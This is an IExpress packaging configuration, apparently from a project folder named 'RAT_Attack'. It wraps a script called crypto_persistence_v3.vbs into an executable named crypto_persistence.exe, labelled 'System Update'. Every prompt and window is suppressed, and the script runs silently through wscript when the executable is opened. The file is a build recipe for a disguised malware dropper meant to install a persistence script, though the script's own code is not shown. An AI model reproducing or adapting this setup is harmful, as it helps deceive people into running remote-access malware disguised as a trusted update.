[Version]
Class=IEXPRESS
SEDVersion=3
[Options]
PackagePurpose=InstallApp
ShowInstallProgramWindow=0
HideExtractAnimation=1
UseLongFileName=1
InsideCompressed=0
CAB_FixedSize=0
CAB_ResvCodeSigning=0
RebootMode=N
InstallPrompt=
DisplayLicense=
FinishMessage=
TargetName=D:\GithubProject\hyundai_project4\RAT_Attack\crypto_persistence.exe
FriendlyName=System Update
AppLaunched=wscript.exe //B //Nologo crypto_persistence_v3.vbs
PostInstallCmd=<None>
AdminQuietInstCmd=
UserQuietInstCmd=
SourceFiles=SourceFiles
[Strings]
FILE0="crypto_persistence_v3.vbs"
[SourceFiles]
SourceFiles0=D:\GithubProject\hyundai_project4\RAT_Attack\
[SourceFiles0]
%FILE0%=
